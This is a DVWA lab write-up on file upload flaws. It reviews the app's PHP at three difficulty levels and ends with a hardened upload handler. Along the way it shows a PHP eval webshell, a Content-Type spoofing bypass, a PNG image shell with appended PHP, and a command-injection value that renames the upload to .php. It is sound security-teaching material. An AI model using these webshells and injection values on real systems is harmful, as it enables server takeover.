DVWA File Upload Vulnerability Audit
● Low 🎈
First try uploading a PHP file and see whether it is accepted and executed:
<?php
phpinfo();
?>
Open it in the browser:
It executes, so a one-line webshell can be uploaded the same way:
<?php
@eval($_REQUEST[555]);
?>
Connect with AntSword.
Code review:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        echo "<pre>{$target_path} succesfully uploaded!</pre>";
    }
}
?>
basename(): returns the filename part of a path, extension included. For example, /xx/test.php returns test.php.
$target_path is the destination path for the uploaded file, and move_uploaded_file() moves the file there. PHP stores an upload in a temporary directory and deletes it when the script finishes, so the file has to be moved to a permanent location. As you can see, this level applies no restrictions at all, so any PHP webshell can be uploaded and connected to.
● Medium 🎈🎈
First try uploading a PHP file and see whether it is accepted and executed:
<?php
phpinfo();
?>
A PHP file cannot be uploaded directly: only JPEG and PNG files are accepted, so there is a file-type restriction.
Capture the request in Burp Suite and change the Content-Type value; the PHP file is then accepted anyway.
So change the file content to the one-line webshell.
Uploaded successfully!!!
Code review:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}
?>
Looking at the source, the code now restricts both the type and the size of the upload: only image/jpeg and image/png are allowed, and the file must be smaller than 100000 bytes. The type check, however, reads $_FILES['uploaded']['type'], which is simply the Content-Type the client sent, so changing that value lets a PHP file through anyway.
● High 🎈🎈🎈
The Medium-level method no longer works.
Look at the source:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}
?>
Looking at the source, the High level takes the substring after the last "." in the filename and uses it to restrict the file type, so the uploaded filename must end in one of ".jpg", ".jpeg" or ".png" (the three extensions the code accepts). On top of that, getimagesize() requires the file header to be that of an image. So an image extension alone is not enough; the file content must also be an image.
(Combine the Low-level command injection with the High-level file upload)
First make an image shell: open a .png file in Notepad++ and append the one-line webshell on its last line
<?php @eval($_REQUEST[555]);?>
Click Upload; the file is accepted.
Use rename to change the extension of the uploaded shell.png image shell to .php:
127.0.0.1|rename C:\phpStudy\WWW\DVWA-2.0.1\hackable\uploads\shell.png shell.php
Then connect with AntSword:
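For comparison, here is what a hardened version of the same upload handler looks like. This is an added example written for this write-up, not DVWA's code. It assumes the same form field name ('uploaded'), the same DVWA_WEB_PAGE_TO_ROOT constant, and that PHP's fileinfo and GD extensions are loaded. It closes each gap seen above: the Low level trusts the user's filename, the Medium level trusts the client-sent Content-Type, and the High level trusts an extension plus a valid image header, which a PNG with PHP appended still satisfies.

```php
<?php
// Added example: hardened replacement for the DVWA upload handler.
// Not DVWA's own code. Assumes the 'uploaded' field, DVWA_WEB_PAGE_TO_ROOT,
// and the fileinfo + GD extensions.

// Ideally uploads live outside the web root; the DVWA folder is kept here
// only so the example stays drop-in compatible with the pages above.
define('UPLOAD_DIR', DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/');
define('MAX_UPLOAD_BYTES', 100000);

// MIME types detected from file CONTENT (magic bytes), each mapped to the
// extension the server will write. The client's Content-Type is never used.
const ALLOWED_IMAGE_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
];

/**
 * Validate and store one uploaded image.
 * Returns [bool ok, string message, ?string savedPath].
 */
function handle_image_upload(array $file): array {
    // 1. Only accept files that arrived through PHP's upload mechanism.
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        return [false, 'Upload failed or was not a genuine upload.', null];
    }

    // 2. Size check on the real on-disk size, not on $_FILES['size'].
    if (filesize($file['tmp_name']) > MAX_UPLOAD_BYTES) {
        return [false, 'File too large.', null];
    }

    // 3. Sniff the type from the bytes. The Medium level compared
    //    $_FILES['type'], which is just the Content-Type the client chose.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!isset(ALLOWED_IMAGE_TYPES[$mime])) {
        return [false, 'Only JPEG or PNG images are accepted.', null];
    }

    // 4. Decode and re-encode through GD. A valid PNG with PHP appended
    //    (the High-level image shell) still decodes, but only the pixel
    //    data survives the re-encode, so the trailing payload is dropped.
    $img = ($mime === 'image/png')
        ? @imagecreatefrompng($file['tmp_name'])
        : @imagecreatefromjpeg($file['tmp_name']);
    if ($img === false) {
        return [false, 'Image could not be decoded.', null];
    }

    // 5. Server-chosen random name and fixed extension. The user's filename
    //    (and therefore basename()/strrpos() parsing) never reaches the disk,
    //    so a later rename trick has nothing to work with either.
    $ext  = ALLOWED_IMAGE_TYPES[$mime];
    $dest = UPLOAD_DIR . bin2hex(random_bytes(16)) . '.' . $ext;

    $written = ($ext === 'png') ? imagepng($img, $dest) : imagejpeg($img, $dest, 90);
    imagedestroy($img);
    if (!$written) {
        return [false, 'Could not write image.', null];
    }
    chmod($dest, 0644); // readable, never executable
    return [true, 'Image uploaded.', $dest];
}

if (isset($_POST['Upload']) && isset($_FILES['uploaded'])) {
    [$ok, $msg, $path] = handle_image_upload($_FILES['uploaded']);
    // Unlike the original, do not echo the server-side path to the client.
    echo '<pre>' . htmlspecialchars($msg, ENT_QUOTES, 'UTF-8') . '</pre>';
}
?>
```

Even with these checks, the upload directory should be served by the web server with script execution disabled, so that a file which somehow lands there with a .php name is returned as static content rather than run. The validation in the handler and the no-execute rule on the directory are independent layers; the walkthrough above shows why relying on any single check is not enough.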